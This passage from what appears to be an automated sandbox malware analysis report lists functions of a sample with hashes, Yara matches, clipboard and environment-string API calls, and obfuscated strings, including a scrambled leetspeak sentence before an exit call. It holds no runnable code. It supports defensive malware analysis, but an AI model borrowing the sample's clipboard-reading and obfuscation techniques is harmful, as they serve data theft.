                                                    • Instruction Fuzzy Hash: 661109715183419FD304CF14D495B1BBBE1BB8A318F458A2DF4D5AB241C778D9058B4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D0D90 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: 5c81f4361908b07e1b355e44fdd23e09d60441cca570a0dfe1a3837b281fad67
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: EC01A7B6700A148FDF21CF24C854BEA37F5EB89219F4544E9E50797242E774B9418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041DFCB0 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction ID: edc022f0f835ff83a5cdfbe39b494090ddee19a70f6f616abed2a4107b6d6b2d
                                                    • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction Fuzzy Hash: 3ED012E5D0414087EA0CEA20EC9197A7262DB96308F28A138C4E753265EB21B919C545
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040FA49 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction ID: de3ce6f7ae6e3d5ea65c66cf0705fbc442ae878a1daf767fd50fb3e27dbea20b
                                                    • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction Fuzzy Hash: 1AD0C264D04500C7D608DA20FC4196A7222DBA130CF28653DD496232A6E930AD198549
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041DD3A7 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction ID: 6ca33cff2030e7d1ed841a683f7be1684981f47ca6dc12ab15e49ada3de7653e
                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction Fuzzy Hash: B8D0A7E15487A11E97588D3854E087BFBF4E947612B1824DEE4D5E3109D324E8018798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040D140 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction ID: ef5f6f15fdba078049cde65a2549cec0935e602115ccd1401630279531ef5664
                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction Fuzzy Hash: 77D0A771A487A10E97588D7808A0477FBE8E947712F1814AFE4D5F7249D638DC05869C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E7494 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                    • Instruction ID: fc63ff7144db230d088183717acfc14d3aba176eca07f96b411a1d117e3a196b
                                                    • Opcode Fuzzy Hash: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                    • Instruction Fuzzy Hash: 62D0127795180A4A9621CF24D981471A7229BC3354734A3444A21633F6DD30D837598C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E47FD Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                    • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04207EAC Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction ID: f45e16bd6bf12c943f4fa679602ffb422c19f1c1188769583267d47369720cef
                                                    • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction Fuzzy Hash: 5CC04828B6A0509A9200DF16AA40432A2BAABC7205B15E0208101632AADA39A806CA8D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04207EAE Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                    • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00414596 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                    • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00437C47 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                    • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00437C45 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction ID: 5c4c2a12a684bc4ff0d5a99ec30874bcdf27f0d0682448e5fdc4a84297f01b14
                                                    • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction Fuzzy Hash: 87C0926CE9D0609FD200DF17FA40431B2BAABDB305B25F0218041632ADCA3AD8078B0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041FC767 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$CloseDataInfoOpenWindow
                                                    • String ID: 7$8$9$:$;
                                                    • API String ID: 2278096442-1017836374
                                                    • Opcode ID: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction ID: a20b5e2a8e53a31f38c4f10cb002b7da607507cf181b38d8d599ad32ed486ae8
                                                    • Opcode Fuzzy Hash: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction Fuzzy Hash: D4518EB0608784CFD724DF28C9C5716BBE0BB05214F058A5DD9DA8BA41F334B906EBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041ED8F7 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 041ED9E4
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 041EDA0F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&
                                                    • API String ID: 237503144-3017178743
                                                    • Opcode ID: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                    • Instruction ID: d2110434b4d3b71bcc35d9cb2667af9c087282c3d319fc7bd6ab5fc9b0a5537c
                                                    • Opcode Fuzzy Hash: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                    • Instruction Fuzzy Hash: 9C717A742083428FE724CF15D890BABB7E1EFC6314F154A2CE9E95B280E774A545CB97
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E4BB7 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 041E4C04
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 041E4C35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                    • API String ID: 237503144-2765572984
                                                    • Opcode ID: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                    • Instruction ID: 2dbd07c413cf32736e804dcebdbd31420aea34bacef00d077f7706666b10b2b7
                                                    • Opcode Fuzzy Hash: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                    • Instruction Fuzzy Hash: 8251A1746183419BD324CF15C891BABB7F5FFC6324F054A1CF9958B281E3B4A805CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EE1B7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 041EE2F4
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 041EE323
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: ru$M3
                                                    • API String ID: 237503144-652937946
                                                    • Opcode ID: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                    • Instruction ID: 3fb33d4d2bea3242fe89a7375dc26af15ee2b92a1d2097102d80c66b7f281dbf
                                                    • Opcode Fuzzy Hash: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                    • Instruction Fuzzy Hash: F95142B5108381AFE714CF01C990B6BBBE5EBC5354F10892DF8A95B381C775EA46CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E3783 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 041E3848
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 041E3879
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: E&eb
                                                    • API String ID: 237503144-175690455
                                                    • Opcode ID: 35764304b26e08c2116ddeae35a6a5734124e71df00623c25cae61cad56f9e43
                                                    • Instruction ID: 28b9682810dd5e83194a161e39002d1c5d4f83591f51b31a3ffebd0ee602ead7
                                                    • Opcode Fuzzy Hash: 35764304b26e08c2116ddeae35a6a5734124e71df00623c25cae61cad56f9e43
                                                    • Instruction Fuzzy Hash: 28618EB5600B409FD328CF28C891B77B3E6AF85314F148A2DE5AAC7690E774B945CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041351C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004135E1
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00413612
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: E&eb
                                                    • API String ID: 237503144-175690455
                                                    • Opcode ID: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                    • Instruction ID: 3627e64b03e8dace2a403a76fce9a7d6649682aa9ea1d52bf6d0af3834cb9b1a
                                                    • Opcode Fuzzy Hash: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                    • Instruction Fuzzy Hash: F761A171600B009FD338CF24C882BA7B3E6EB45315F148A2DE4AAC77D0E778B9858B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04201F37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 0420201A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: m%s$!EJK
                                                    • API String ID: 237503144-2691780584
                                                    • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction ID: 19cd1fcf01f9d5b191986fe644048711ce0aeb1046cfe0511377efec66d5b57f
                                                    • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction Fuzzy Hash: 9A21A9B10083808FD304CF14D891B2BBBF4FB86348F100A2CF9A1AB280D771D9058B86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00431DB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: m%s$!EJK
                                                    • API String ID: 237503144-2691780584
                                                    • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction ID: 1bf3f748f95ab631ae595585e1a386fe61c7083a19ceef915992d3bd27d4ea4a
                                                    • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction Fuzzy Hash: 4D219AB14083908FD304CF15D891B5BBBF4FB8A348F110A2DF9A1AB280D775D905CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D8EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 041D8F24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                    • API String ID: 621844428-4175449110
                                                    • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction ID: 535416a31db32d85ac9067df0811993fac80e365130cf1e79eaa23e648d351c6
                                                    • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction Fuzzy Hash: 20F0FCF0E182009BEB0C7B78FEC526D3FA69F01264F010AA6C8FA82144F774B10596B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%